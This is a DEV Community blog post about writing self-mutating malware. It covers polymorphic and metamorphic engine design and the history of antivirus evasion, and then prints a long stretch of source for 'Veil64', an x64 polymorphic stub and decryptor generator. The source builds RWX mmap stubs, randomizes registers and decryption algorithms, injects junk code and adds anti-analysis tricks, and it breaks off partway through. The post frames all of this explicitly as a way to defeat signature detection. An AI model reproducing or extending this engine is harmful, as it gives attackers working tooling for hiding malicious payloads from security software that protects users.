DEV Community

Cover image for The Art of Self-Mutating Malware
Excalibra
Excalibra

Posted on

The Art of Self-Mutating Malware

Article Summary: This article systematically elaborates on the technical evolution and implementation principles of self-mutating malware, covering the core mechanisms of polymorphic and metamorphic engines. Through two concrete examples — Veil64 and Morpheus — the author "f00crew" from Hong Kong China, analyzes key techniques such as register randomization, algorithmic variants, and intelligent junk code injection. It emphasizes how mutation at the syntactic, structural, and semantic layers can evade signature-based detection while strictly adhering to the principle of behavioral conservation. The author points out that the essence of mutation technology is to keep functionality unchanged while infinitely varying the implementation method, and warns of risks such as code size inflation and stability issues.

Categories: Malware, Binary Security, Vulnerability Analysis, Red Teaming, Penetration Testing

The Art of Self-Mutating Malware

In the beginning, detection relied on signatures — a simple byte string that could uniquely identify a malicious sample. In that era, the process was straightforward: append the virus to the end of a file and patch the entry point. The AV industry quickly responded with signature databases, and for a period, the rhythm of this confrontation was predictable.

This article discusses how to implement self-mutating malicious code: how to build your own polymorphic engine, and some core ideas behind metamorphic code. For malicious code, self-mutation is one of the most elegant paths to solving the detection problem. You no longer just hide yourself — you become “another you” with every replication. This is the purest form of digital evolution.

The concepts we discuss do not depend on any specific implementation. Although the article uses real examples and practical principles from code I have written, the real value lies in understanding the underlying theory of “why mutation is feasible.”

Let’s go back to the beginning. Early VX practices were crude: they directly overwrote files and caused destruction. Some samples would first run the original program and then deliver their own payload. AV quickly caught up, mainly relying on signature scanning to catch samples.

The VX community evolved accordingly and began encrypting their code. The payload remained encrypted and was only unpacked at runtime. AV then turned its attention to the decryptor, so VX authors began dynamically transforming decryption routines. Some families even automatically rotated decryptors — this type later became known as oligomorphic.

Around 1985 to 1990, AV dominated with static signature scanning: string matching and fixed byte patterns made samples easy to hit once they landed on disk. By the early 1990s, the situation began to change. Virus bodies started to be encrypted, exposing only a decryption stub. This stub immediately became AV’s primary hunting target and spurred the development of wildcard and heuristic scanning.

Then polymorphic viruses appeared. The virus would automatically generate a new decryptor at creation time or during each infection. Each instance had its own encryption/decryption routine and evaded scanning by rearranging machine code. This was the typical feature from 1995 to 2000: the same virus, infinite appearances. Dark Avenger’s MtE engine completely rewrote the rules of this game.

After that, metamorphic viruses emerged. They no longer relied on an encryption shell. They would rewrite the entire body with every infection. Code structure, control flow, and register usage would all change, but the payload remained unchanged. Between 2000 and 2005, metamorphic samples like Zmist and Simile raised the bar even higher: there was no fixed decryptor to track — only continuous code mutation.

Metamorphic code changes everything, not just the decryptor. It evolved from polymorphism but upgraded from “encryption camouflage” to “overall code reshaping.” Detection difficulty is extremely high; implementation difficulty is equally high, especially at the assembly level.

Overview

When it comes to self-modifying loaders, you have two paths. The first is to keep it small and aggressive: build a lightweight, fast loader that only performs “just enough” mutation — tweak a few places here, quickly shuffle a few there — to slip past scanners without triggering obvious alerts. The code remains compact and raw, but reliable enough.

The other path is full metamorphosis. The loader no longer just fine-tunes itself; it disassembles and rebuilds itself. Layouts are rearranged, instructions are scattered, and entirely new encryption is used on every run. Even if reverse engineers and AV capture one version, the next version will look like a completely unfamiliar sample.

This is not magic. Making it run stably after every mutation is extremely difficult. You must build in validation: count instructions, verify jumps, and perform sanity checks on every change — otherwise it will crash immediately. Even more troublesome is that code size can balloon out of control, eventually losing practicality.

Before discussing specific techniques, we must first clarify: when we talk about executable code, what does “mutation” really mean? It is not just “changing a few bytes,” but the relationship between “form and function,” and how far this relationship can be stretched without destroying behavior.

— The Essence of Identity —

What exactly makes a program “itself”? Is it the order of instructions? Register usage? Memory layout? Or something deeper, like intent?

Mutation’s answer is: identity does not lie in what the code looks like, but in what the code does. As long as two binaries produce the same output for the same input, they are functionally equivalent — even if their assembly is completely different.

Version A:                    Version B:                    Version C:
mov eax, 0                    xor eax, eax                  sub eax, eax
inc ebx                       add ebx, 1                    lea ebx, [ebx+1]
Enter fullscreen mode Exit fullscreen mode
Bytes:                        Bytes:                        Bytes:
B8 00 00 00 00 43             31 C0 83 C3 01                29 C0 8D 5B 01
Enter fullscreen mode Exit fullscreen mode

Three completely different byte patterns that produce identical behavior. This was my “eureka moment” and the starting point for all subsequent implementations.

The core insight is: a program’s identity is not its bytes, but its behavior. If I can generate infinitely many patterns that keep behavior unchanged while making bytes different, signature-based detection will be continuously undermined.

But this also raises harder questions:

  • How to systematically generate equivalent code?
  • How to guarantee correctness across mutations?
  • How to make variants truly unpredictable?

These three questions directly shaped the design of my two engines. They explore different paths to “mutation,” and we call them Veil64 and Morpheus.

Veil64 is a polymorphic code generator used to produce infinite variants of decryption routines: same functionality, infinite forms. Morpheus is a file infector that truly rewrites its own code during execution.

This is the core idea. Everything else is built on top of it: if you cannot hide what is done, then make how it is done unpredictable.

Signatures are the byte patterns that AV focuses on tracking — the “high-risk” digital footprints. Strings, code fragments, hashes — anything that can mark malware will be used. Encryption is a key technique here: it scrambles these recognizable markers, making it difficult for AV to hit them.

Then there is the payload, the part that actually executes the malicious logic. It usually does not run alone but is bound to a stub. This small module decrypts and launches the payload in memory. Because the payload itself is encrypted, AV has difficulty hitting it statically and instead targets the stub. The advantage is that the stub is small and easy to continuously mutate, allowing it to constantly bypass old rules.

This turns the confrontation into a “one-to-many” game, and this mathematical relationship naturally favors the mutation side. Each new variant has a chance to break old detection rules, burn old signatures, and continue to lurk.

“What starts as polymorphic finishes as metamorphic.”

— Levels of Mutation —

Mutation is not just surface-level change — it occurs across layers, including syntactic, structural, and semantic reconstruction.

First, syntactic mutation (grammar-level mutation). This is the outermost layer: replacing equivalent instructions, randomizing register usage, and reordering operations. Appearance changes, result remains the same.

Original:     mov eax, [ebx+4]
Mutated:      push ebx
              add ebx, 4
              mov eax, [ebx]
              sub ebx, 4
              pop ebx
Enter fullscreen mode Exit fullscreen mode

Both snippets load the value at [ebx+4] into eax, but the instruction paths are completely different.

Deeper is structural mutation (structure-level mutation). The change is more profound: reconnecting control flow, rewriting data structures, or even replacing entire algorithms with “different paths but equivalent results.”

The deepest is semantic mutation (semantic-level mutation). It splits functions and reorganizes logic into behaviorally equivalent bodies while ensuring the original intent remains unchanged.

— The Conservation Principle —

No matter how aggressive the mutation, there is one non-negotiable constraint: the program’s semantic behavior must be preserved. What is done (functional output) must remain unchanged; only how it is done (internal implementation mechanism) can change.

The genotype (underlying code structure) can freely drift, mutate, and be obfuscated; the phenotype (externally observable behavior) must remain constant. All mutation techniques can only operate within this boundary.

Naive Approaches

Polymorphism is the purest form of mutation. It essentially expresses the same thing in a thousand different ways. Like a chameleon with a clear goal: core behavior is locked, while everything else continuously changes. No fixed identity, only endless variants.

My first serious attempt to break signature detection was Veil64: a polymorphic code generator capable of generating infinite different ways to write the same decryption logic. The goal was simple: encrypt the payload differently every time and ensure the decryptor never appears the same twice.

— Core Challenges —

Constructing code that can correctly decrypt every time but looks different each time is non-trivial. Every generation must be compact, fast, clean, highly efficient, without leaving obvious patterns, and resistant to both static and dynamic analysis.

I started with a simple two-stage design, and understanding this split is key to why it works. The first layer is the stub: a minimal piece of code responsible for memory allocation and decrypting the embedded engine. The second layer is the engine itself: the polymorphic decryptor that actually handles the payload.

┌─────────────────┐
│   Stub Code     │   (119-200 bytes)
├─────────────────┤
│ Encrypted Engine│   (176-300 bytes)
├─────────────────┤
│   Padding       │
└─────────────────┘
Enter fullscreen mode Exit fullscreen mode

Why use two stages? Because this allows the polymorphic engine itself to be encrypted. The stub is small and simple, so even with variants, the signature surface is limited. The real polymorphic power resides in the engine. By encrypting the engine and embedding it inside the stub, complex and variable code is hidden until runtime.

The overall flow is as follows: you call genrat() with a buffer, size, and seed key. The engine first generates a runtime key using multiple entropy sources: RDTSC provides hardware timing, stack pointer provides process differences, and RIP provides position-related randomness. It then builds the polymorphic engine, including random register allocation, selection among four algorithmic variants, and intelligent junk code injection.

Next comes the stub generation stage. Multiple mmap syscall initialization variants are generated, RIP-relative addressing is handled for position independence, and the encrypted engine is embedded. Finally, everything is encrypted and assembled into executable code.

The clever part is that the stub and engine change independently. Even if someone creates a signature for a stub variant, the internal encrypted engine is different every time. Even if they manage to extract and analyze the engine, the next generation will use a completely different set of registers and algorithms.

— The Four Pillars of Polymorphism —

Never use the same set of registers twice.

Hard-coded registers are signature bait. If your decryptor always uses EAX as a counter and EBX as a data pointer, you are practically exposing yourself. Such patterns will be quickly flagged, so the engine randomizes register usage on every generation.

But this is not random grabbing. The selection process avoids conflicts, skips RSP to prevent stack corruption, and ensures no register takes on multiple roles. The underlying logic looks roughly like this:

get_rr:
    call next_random
    and rax, 7
    cmp al, REG_RSP           ; Never use stack pointer
    je get_rr
    cmp al, REG_RAX           ; Avoid RAX conflicts
    je get_rr
    mov [rel reg_base], al    ; Store base register

.retry_count:
    call next_random
    and rax, 7
    cmp al, REG_RSP
    je .retry_count
    cmp al, [rel reg_base]    ; Ensure no conflicts
    je .retry_count
    mov [rel reg_count], al
Enter fullscreen mode Exit fullscreen mode

This process is repeated for key registers and all registers used in junk code. Even before considering algorithms and junk injection, there are already 210 possible register combinations. That means the same register-level operation can have 210 different appearances — all completely distinct to a signature scanner.

One variant might use RBX for data, RCX for counting, and RDX for the key. The next might switch to RSI for data, RDI for counting, and RBX for the key. Yet another could use extended registers R8, R9, R10. Every combination is functionally equivalent, but the opcode patterns are completely different.

— Four Ways to Say the Same Thing —

Register randomization is only the starting point. True depth comes from algorithmic polymorphism. We do not fix a single decryption flow but cycle between four equivalent algorithms: same output, completely different instruction streams.

This is not simply swapping XOR for ADD. Each variant is carefully designed to guarantee correctness while maximizing signature dispersion.

  • Algorithm 0: ADD → ROL → XOR
  • Algorithm 1: XOR → ROL → XOR
  • Algorithm 2: SUB → ROR → XOR
  • Algorithm 3: XOR → ADD → XOR

All four algorithms produce identical final results, but their instruction sequences and opcode patterns are entirely different.

Each algorithm has a corresponding inverse process in the encryption phase. For example, if encryption uses XOR → ROR → SUB, decryption uses ADD → ROL → XOR. Mathematically they cancel perfectly, but the instruction flows never look the same. Opcode patterns, instruction lengths, and register usage all change. To a signature scanner, they appear as completely different routines.

— Intelligent Junk Code —

Most polymorphic engines fail here: they either stuff random bytes or pile on obvious NOP sleds, practically shouting “I’m malware.” That is low-level. True polymorphism uses “intentional-looking” junk code that blends into the context and mimics normal compiler output.

Junk injection is not purely random — it is structured. It uses no-net-effect PUSH/POP pairs that look like register preservation, XOR reg, reg to imitate common zeroing initialization, and MOV reg, reg that resembles typical compiler register shuffling.

This is just a very basic example. Some engines do it more aggressively. The key point is to make it look like real developer code. PUSH RAX followed by POP RBX can masquerade as register saving and transfer; XOR RAX, RAX looks like legitimate initialization; MOV RAX, RAX resembles dead code left by an optimizer. Functionally they add no value, but visually they blend in.

Junk injection also deliberately varies in density: sometimes heavy, sometimes sparse; sometimes clumped, sometimes scattered in loops. There is no fixed “junk zone” that can be isolated — only code that looks normal every single time.

— Breaking Linear Analysis —

Static analysis relies on linear flow: traversing code, building graphs, and extracting patterns. So we break it. Random jumps are inserted to skip over junk regions, directly destroying straight-line logic.

Jump generation is subtle. Sometimes 2-byte short jumps, sometimes 5-byte long jumps; they may skip only 1 byte or over a dozen. The skipped junk content is randomized every time. Even if the analyzer follows the jump path, its rhythm is disrupted on every run.

This produces unpredictable control flow and interferes with both static and dynamic analysis. Static tools face non-linear instruction streams mixed with random data; dynamic tools encounter different execution paths on every run, making it difficult to build a stable behavioral profile.

These jumps also serve a dual purpose: they mimic compiler output. Real compiled code is full of branches, jumps, and irregular flow. Injecting our own jumps increases this “natural complexity,” helping the code blend more seamlessly.

— The Entropy Problem —

Hard-coded keys or constants are traps. I learned this the hard way: early versions embedded the constant 0xDEADBEEF in every variant. No matter how much the rest of the code changed, that fixed value instantly became a red flag.

The solution is runtime key generation: no fixed constants, no repetition, no nail-down patterns. The key is reconstructed on every execution, drawing from multiple entropy sources that vary with execution round, process, and machine.

Entropy comes from multiple sources. RDTSC provides high-resolution microsecond-level timing; the stack pointer changes with processes and function calls; RIP brings position-related randomness under ASLR; the user key introduces input-driven variation.

The real strength lies in how these values are combined. It is not simple XOR, but involves rotations, complements, and mixing with stack-related values. Each transformation step depends on the current state, forming a dependency chain that ultimately produces a truly unpredictable key.

— Randomness Is Critical —

Excellent polymorphic capability depends on high-quality randomness. Many engines use basic linear congruential generators or simple incrementing counters — both easily produce predictable patterns that can be flagged. I prefer the XorShift PRNG: fast, long period (2^64−1), and passes strong statistical randomness tests without repeating for a very long time.

Under ASLR, code is loaded at different addresses each time. Hard-coded absolute addresses will cause the polymorphic decryptor to fail if it lands in an unexpected location. The solution is RIP-relative addressing, with offsets calculated based on the current instruction pointer.

— Just-in-Time Machine Code Generation —

This is where we reach the real core. You cannot simply rearrange pre-written assembly and call it polymorphic. The engine generates raw x64 machine code on the fly, building every instruction byte by byte. Opcodes and operands are computed dynamically based on the current register allocation and algorithm choice.

The ModRM byte is especially critical in x64: it encodes which registers are used. By calculating this byte dynamically, the engine can implement the same operation with any register combination, producing different bytes — and therefore different signatures.

The same polymorphic thinking applies to all syscall parameters. Multiple construction methods are used to avoid pattern matching.

— Performance and Scalability —

Basic generation averages 9 to 13 milliseconds per variant, translating to 50,000 to 75,000 variants per minute — enough to overwhelm signature detection. Speed is not higher because each variant undergoes register renaming, flow randomization, intelligent junk injection, and anti-debug checks.

Generation time fluctuates by ±3 to 4 ms by design to avoid predictability; stable timing would aid detection. The engine maintains this jitter by varying instruction order, junk block size, and encryption rounds.

Static memory footprint is approximately 340 to 348 KB — far larger than toy 4 KB engines. This includes precomputed transformation tables, runtime mutation logic, and anti-emulation traps. Per-variant memory usage remains stable with no leaks or growth.

Code size fluctuates between 180 bytes and 1.2 KB. Compact variants favor speed; balanced variants strike a compromise; complex variants maximize complexity to stress AV engines.

— What Variants Look Like —

Variant #1: Size 335, Key 0x4A4BDC5C3AEAC0AD
48 C7 C0 0A 00 00 00    mov rax, 10
48 FF C8                dec rax
50                      push rax
58                      pop rax
90                      nop
48 31 FF                xor rdi, rdi
...

Variant #2: Size 368, Key 0x6BAAA583D73FA32B
50                      push rax
58                      pop rax
50                      push rax
58                      pop rax
48 31 C0                xor rax, rax
48 83 C0 09             add rax, 9
...

Variant #3: Size 385, Key 0x5C3F1EDF85C0D55E
90                      nop
90                      nop
50                      push rax
58                      pop rax
48 C7 C0 09 00 00 00    mov rax, 9
...
Enter fullscreen mode Exit fullscreen mode

Look at the differences. Variant #1 sets RAX by loading 10 then decrementing. Variant #2 uses PUSH/POP junk first, then XOR/ADD. Variant #3 starts with NOPs, inserts another set of junk, then loads directly. The result is the same (RAX = 9), but the method is completely different.

Size fluctuation is large. These three samples differ by less than 50 bytes. In reality, the engine can produce variants from compact 180-byte versions to large 1200-byte versions, depending on the intensity of junk injection and obfuscation.

The engine classifies variants into three categories by structure and complexity. Compact types (≈295–350 bytes) minimize junk and prioritize speed; balanced types (up to 400 bytes) compromise between obfuscation and stability; complex types (up to 500 bytes) layer more polymorphic techniques and anti-analysis features.

With four algorithms combined with 210 register permutations, there are already 840 base variants before adding junk and control-flow obfuscation. Introducing variable junk injection, diverse jump patterns, and multiple stub initialization methods expands the variant space into the millions.

The key is not just quantity, but “functional equivalence + signature diversity.” Every variant can correctly decrypt the payload, yet appears distinctly different from a signature-detection perspective.

Effective polymorphism maximizes signature diversity without degrading correctness. Generating billions of variants is meaningless if many are broken or still share detectable patterns. Correctness and diversity scale must hold simultaneously.

— Built-in Anti-Analysis Design —

Emulation engines usually struggle with variable timing, and junk code injection creates unpredictable execution durations. Key generation dependent on stack state makes the same variant behave differently across process contexts. Reliance on hardware timestamps further increases emulation cost because it requires accurate RDTSC simulation.

With no fixed constants or strings, static analysis tools struggle because there are almost no grep-able or fingerprintable anchors. Polymorphic control flow breaks linear analysis, while the encrypted embedded engine hides core logic until runtime.

Dynamic analysis is also disrupted by “legitimate-looking, functionally neutral” junk code. Multiple execution paths generate different behavioral traces on every run. Runtime key derivation ensures each execution has a unique key, making results difficult to reuse even if tracing succeeds.

Anti-analysis features are not optional — they are part of the system. Every polymorphic technique serves two purposes simultaneously: evading signatures and increasing analysis cost.

Veil64 Full Source Code

;------------------------------------------------------------
;   [ V E I L 6 4 ]
;------------------------------------------------------------
;   Type:           Polymorphic Engine / Stub Generator
;   Platform:       x86_64 Linux
;   Size:           ~4KB Engine + Custom Stub
;                   Runtime shellcode obfuscation, encryption,
;                   and stealth execution via mmap + RIP tricks.
;
;                                                   0xf00sec
;------------------------------------------------------------

section .text

global genrat
global exec_c
global _start

; x64 opcodes
%define PUSH_REG           0x50
%define POP_REG            0x58
%define ADD_MEM_REG        0x01
%define ADD_REG_IMM8       0x83
%define ROL_MEM_IMM        0xC1
%define XOR_MEM_REG        0x31
%define TEST_REG_REG       0x85
%define JNZ_SHORT          0x75
%define JZ_SHORT           0x74
%define CALL_REL32         0xE8
%define JMP_REL32          0xE9
%define JMP_SHORT          0xEB
%define RET_OPCODE         0xC3
%define NOP_OPCODE         0x90
%define JNZ_LONG           0x0F85
%define FNINIT_OPCODE      0xDBE3
%define FNOP_OPCODE        0xD9D0

; register encoding
%define REG_RAX            0
%define REG_RCX            1
%define REG_RDX            2
%define REG_RBX            3
%define REG_RSP            4
%define REG_RBP            5
%define REG_RSI            6
%define REG_RDI            7

section .data

stub_key:               dq 0xDEADBEEF            ; runtime key
sec_key:                dq 0x00000000
engine_size:            dq 0
dcr_eng:                dq 0
stub_sz:                dq 0
sz:                     dq 0

seed:                   dq 0                     ; PRNG state
p_entry:                dq 0                     ; output buffer
key:                    dq 0                     ; user key
reg_base:               db 0                     ; selected registers
reg_count:              db 0
reg_key:                db 0
junk_reg1:              db 0                     ; junk registers
junk_reg2:              db 0
junk_reg3:              db 0
prolog_set:             db 0
fpu_set:                db 0
jmp_back:               dq 0
alg0_dcr:               db 0                     ; algorithm selector

align 16
entry:
times 4096 db 0                                 ; engine storage
exit:

section .text

; main generator entry point
genrat:
    push rbp
    mov rbp, rsp
    sub rsp, 64
    push rbx
    push r12
    push r13
    push r14
    push r15

    test rdi, rdi                               ; validate params
    jz .r_exit
    test rsi, rsi
    jz .r_exit
    cmp rsi, 1024                               ; min buffer size
    jb .r_exit

    mov [rel p_entry], rdi
    mov [rel sz], rsi
    mov [rel key], rdx

    call gen_runtm                              ; generate runtime keys

    lea rdi, [rel entry]
    mov r12, rdi
    call gen_reng                               ; build engine

    mov rax, rdi                                ; calculate engine size
    sub rax, r12
    mov [rel engine_size], rax

    mov rdi, [rel p_entry]
    call unpack_stub                            ; build stub
    call enc_bin                                ; encrypt payload

    mov rax, [rel stub_sz]                      ; total
    test rax, rax
    jnz .calc_sz
    mov rax, rdi
    sub rax, [rel p_entry]

.calc_sz:
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    add rsp, 64
    pop rbp
    ret

.r_exit:
    xor rax, rax
    pop r15
    pop r14
    pop r13
    pop r12
    pop rbx
    add rsp, 64
    pop rbp
    ret

; generate engine
gen_reng:
    push rdi
    push rsi
    push rcx

    rdtsc
    xor rax, [rel key]
    mov rbx, 0x5DEECE66D
    xor rax, rbx
    mov rbx, rax
    shl rbx, 13
    xor rax, rbx
    mov rbx, rax
    shr rbx, 17
    xor rax, rbx
    mov rbx, rax
    shl rbx, 5
    xor rax, rbx
    xor rax, rsp
    mov [rel seed], rax

    push rdi                                    ; clear state
    lea rdi, [rel reg_base]
    mov rcx, 16
    xor rax, rax
    rep stosb
    pop rdi

    pop rcx
    pop rsi
    pop rdi

    call get_rr                                 ; select random registers
    call set_al                                 ; pick decrypt algorithm
    call gen_p                                  ; generate prologue

    call yes_no                                 ; random junk insertion
    test rax, rax
    jz .skip_pr
    call gen_trash

.skip_pr:
    call trash

    call yes_no
    test rax, rax
    jz .skip_dummy
    call gen_dummy

.skip_dummy:
    call gen_dec                                ; main decrypt loop

    call yes_no
    test rax, rax
    jz .skip_prc
    call gen_trash

.skip_prc:
    mov al, RET_OPCODE
    stosb

    cmp qword [rel jmp_back], 0                 ; conditional jump back
    je .skip_jmp

    mov ax, JNZ_LONG
    stosw
    mov rax, [rel jmp_back]
    sub rax, rdi
    sub rax, 4
    stosd

.skip_jmp:
    call trash
    mov al, RET_OPCODE
    stosb
    ret

; encrypt generated engine
enc_bin:
    push rdi
    push rsi
    push rcx
    push rax
    push rbx

    lea rdi, [rel entry]
    mov rcx, [rel engine_size]

    ; validate engine size
    test rcx, rcx
    jz .enc_done
    cmp rcx, 4096
    ja .enc_done
    cmp rcx, 10
    jb .enc_done

    ; encrypt in place
    mov rax, [rel stub_key]
    mov rsi, rcx

.enc_loop:
    test rsi, rsi
    jz .enc_done
    xor byte [rdi], al
    rol rax, 7
    inc rdi
    dec rsi
    jmp .enc_loop

.enc_done:
    pop rbx
    pop rax
    pop rcx
    pop rsi
    pop rdi
    ret

; build stub wrapper
unpack_stub:
    push rbx
    push rcx
    push rdx
    push r12

    mov r12, rdi

    call bf_boo                                 ; bounds check
    jae .stub_flow

    call stub_trash
    call gen_stub_mmap
    call stub_decrypt

    mov rax, rdi
    sub rax, r12
    mov [rel stub_sz], rax

    call stub_trash

    ; update size after junk
    mov rax, rdi
    sub rax, r12

    ; check space for encrypted engine
    mov rbx, rax
    add rax, [rel engine_size]
    cmp rax, [rel sz]
    ja .stub_flow

    ; embed encrypted engine
    lea rsi, [rel entry]
    mov rcx, [rel engine_size]
    test rcx, rcx
    jz .skip_embed
    rep movsb

.skip_embed:
    ; final size calculation
    mov rax, rdi
    sub rax, r12
    mov [rel stub_sz], rax

    pop r12
    pop rdx
    pop rcx
    pop rbx
    ret

.stub_flow:
    xor rax, rax
    mov [rel stub_sz], rax
    pop r12
    pop rdx
    pop rcx
    pop rbx
    ret

; generate stub junk
stub_trash:
    call next_random
    and rax, 7                                  ; 0-7 junk instructions
    mov rcx, rax
    test rcx, rcx
    jz .no_garbage

.trash_loop:
    call next_random
    and rax, 3                                  ; choose junk type
    cmp al, 0
    je .gen_nop
    cmp al, 1
    je .gen_push_pop
    cmp al, 2
    je .gen_xor_self
    jmp .gen_mov_reg

.gen_nop:
    mov al, 0x90
    stosb
    jmp .next_garbage

.gen_push_pop:
    mov al, 0x50                                ; push rax
    stosb
    mov al, 0x58                                ; pop rax
    stosb
    jmp .next_garbage

.gen_xor_self:
    mov al, 0x48                                ; rex.w
    stosb
    mov al, 0x31                                ; xor rax,rax
    stosb
    mov al, 0xC0
    stosb
    jmp .next_garbage

.gen_mov_reg:
    mov al, 0x48                                ; rex.w
    stosb
    mov al, 0x89                                ; mov rax,rax
    stosb
    mov al, 0xC0
    stosb

.next_garbage:
    loop .trash_loop

.no_garbage:
    ret

; generate mmap syscall stub
gen_stub_mmap:
    ; mmap setup
    call next_random
    and rax, 3                                  ; choose method
    cmp al, 0
    je .mmap_method_0
    cmp al, 1
    je .mmap_method_1
    cmp al, 2
    je .mmap_method_2
    jmp .mmap_method_3

.mmap_method_0:
    ; mov rax, 9
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC0
    stosb
    mov eax, 9                                  ; mmap syscall
    stosd
    jmp .mm_continue

.mmap_method_1:
    ; xor rax,rax; add rax,9
    mov al, 0x48
    stosb
    mov al, 0x31
    stosb
    mov al, 0xC0
    stosb
    mov al, 0x48
    stosb
    mov al, 0x83
    stosb
    mov al, 0xC0
    stosb
    mov al, 9
    stosb
    jmp .mm_continue

.mmap_method_2:
    ; mov rax,10; dec rax
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC0
    stosb
    mov eax, 10
    stosd
    mov al, 0x48
    stosb
    mov al, 0xFF
    stosb
    mov al, 0xC8
    stosb
    jmp .mm_continue

.mmap_method_3:
    ; mov rax,18; shr rax,1
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC0
    stosb
    mov eax, 18
    stosd
    mov al, 0x48
    stosb
    mov al, 0xD1
    stosb
    mov al, 0xE8
    stosb

.mm_continue:
    call stub_trash

    ; rdi setup
    call next_random
    and rax, 1
    test rax, rax
    jz .rdi_method_0

    ; mov rdi,0
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC7
    stosb
    mov eax, 0
    stosd
    jmp .rdi_done

.rdi_method_0:
    ; xor rdi,rdi
    mov al, 0x48
    stosb
    mov al, 0x31
    stosb
    mov al, 0xFF
    stosb

.rdi_done:

    ; mov rsi,4096
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC6
    stosb
    mov eax, 4096
    stosd

    ; mov rdx,7 (rwx)
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC2
    stosb
    mov eax, 7
    stosd

    ; mov r10,0x22 (private|anon)
    mov al, 0x49
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC2
    stosb
    mov eax, 0x22
    stosd

    ; mov r8,-1
    mov al, 0x49
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC0
    stosb
    mov eax, 0xFFFFFFFF
    stosd

    ; mov r9,0
    mov al, 0x4D
    stosb
    mov al, 0x31
    stosb
    mov al, 0xC9
    stosb

    ; syscall
    mov al, 0x0F
    stosb
    mov al, 0x05
    stosb
    ret

; generate decryption stub
stub_decrypt:
    ; mov rbx,rax (save mmap result)
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xC3
    stosb

    ; calculate RIP-relative offset to embedded engine
    mov r15, rdi

    mov rax, [rel p_entry]
    mov rdx, [rel stub_sz]
    test rdx, rdx
    jnz .usszz
    ; fallback calculation
    mov rdx, rdi
    sub rdx, [rel p_entry]
    add rdx, 100

.usszz:
    add rax, rdx                                ; engine position

    ; RIP-relative calculation
    mov rbx, r15
    add rbx, 7                                  ; after LEA instruction
    sub rax, rbx

    ; lea rsi,[rip+offset]
    mov al, 0x48
    stosb
    mov al, 0x8D
    stosb
    mov al, 0x35
    stosb
    stosd

    ; mov rcx,engine_size
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC1
    stosb
    mov rax, [rel engine_size]
    test rax, rax
    jnz .engine_sz
    mov rax, 512

.engine_sz:
    cmp rax, 65536
    jbe .size_ok
    mov rax, 65536

.size_ok:
    stosd

    ; mov rdx,stub_key
    mov al, 0x48
    stosb
    mov al, 0xBA
    stosb
    mov rax, [rel stub_key]
    stosq

    ; decryption loop
    mov r14, rdi

    ; test rcx,rcx
    mov al, 0x48
    stosb
    mov al, 0x85
    stosb
    mov al, 0xC9
    stosb

    ; jz done
    mov al, 0x74
    stosb
    mov al, 0x10
    stosb

    ; xor [rsi],dl
    mov al, 0x30
    stosb
    mov al, 0x16
    stosb

    ; rol rdx,7
    mov al, 0x48
    stosb
    mov al, 0xC1
    stosb
    mov al, 0xC2
    stosb
    mov al, 7
    stosb

    ; inc rsi
    mov al, 0x48
    stosb
    mov al, 0xFF
    stosb
    mov al, 0xC6
    stosb

    ; dec rcx
    mov al, 0x48
    stosb
    mov al, 0xFF
    stosb
    mov al, 0xC9
    stosb

    ; jmp loop
    mov al, 0xEB
    stosb
    mov rax, r14
    sub rax, rdi
    sub rax, 1
    neg al
    stosb

    ; copy to allocated memory
    ; mov rdi,rbx
    mov al, 0x48
    stosb
    mov al, 0x89
    stosb
    mov al, 0xDF
    stosb

    ; calculate engine position
    mov rax, [rel p_entry]
    mov rbx, [rel stub_sz]
    add rax, rbx

    ; RIP-relative offset
    mov rbx, rdi
    add rbx, 7
    sub rax, rbx

    ; lea rsi,[rip+offset]
    mov al, 0x48
    stosb
    mov al, 0x8D
    stosb
    mov al, 0x35
    stosb
    stosd

    ; mov rcx,engine_size
    mov al, 0x48
    stosb
    mov al, 0xC7
    stosb
    mov al, 0xC1
    stosb
    mov rax, [rel engine_size]
    test rax, rax
    jnz .engine_sz2
    mov rax, 256
.engine_sz2:
    stosd

    ; rep movsb
    mov al, 0xF3
    stosb
    mov al, 0xA4
    stosb

    mov al, RET_OPCODE
    stosb

    ret

bf_boo:
    push rbx

    mov rax, rdi
    sub rax, [rel p_entry]
    add rax, 300
    cmp rax, [rel sz]

    pop rbx
    ret

; generate runtime keys
gen_runtm:
    push rbx
    push rcx

    rdtsc                                       ; entropy from RDTSC
    shl rdx, 32
    or rax, rdx
    xor rax, [rel key]                          ; mix with user key

    mov rbx, rsp                                ; stack entropy
    xor rax, rbx

    call .get_rip                               ; RIP entropy
.get_rip:
    pop rbx
    xor rax, rbx

    rol rax, 13

    mov rbx, rax                                ; dynamic constant
    ror rbx, 19
    xor rbx, rsp
    add rax, rbx

    mov rbx, rax                                ; dynamic XOR
    rol rbx, 7
    not rbx
    xor rax, rbx

    mov [rel stub_key], rax

    rol rax, 7                                  ; secondary key
    mov rbx, 0xCAFE0F00
    shl rbx, 32
    or rbx, 0xDEADC0DE
    xor rax, rbx
    mov [rel sec_key], rax

    mov rax, [rel stub_key]                     ; ensure different from user key
    cmp rax, [rel key]
    jne .keys_different
    not rax
    mov [rel stub_key], rax
.keys_different:

    pop rcx
    pop rbx
    ret

; PRNG
next_random:
    push rdx
    mov rax, [rel seed]
    mov rdx, rax
    shl rdx, 13
    xor rax, rdx
    mov rdx, rax
    shr rdx, 17
    xor rax, rdx
    mov rdx, rax
    shl rdx, 5
    xor rax, rdx
    mov [rel seed], rax
    pop rdx
    ret

random_range:
    push rdx
    call next_random
    pop rcx
    test rcx, rcx
    jz .range_zero
    xor rdx, rdx
    div rcx
    mov rax, rdx
    ret
.range_zero:
    xor rax, rax
    ret

; random boolean
yes_no:
    call next_random
    and rax, 0xF
    cmp rax, 7
    setbe al
    movzx rax, al
    ret

; select random registers
get_rr:
    call next_random
    and rax, 7
    cmp al, REG_RSP
    je get_rr
    cmp al, REG_RAX                             ; avoid rax as base
    je get_rr
    mov [rel reg_base], al

.retry_count:
    call next_random
    and rax, 7
    cmp al, REG_RSP
    je .retry_count
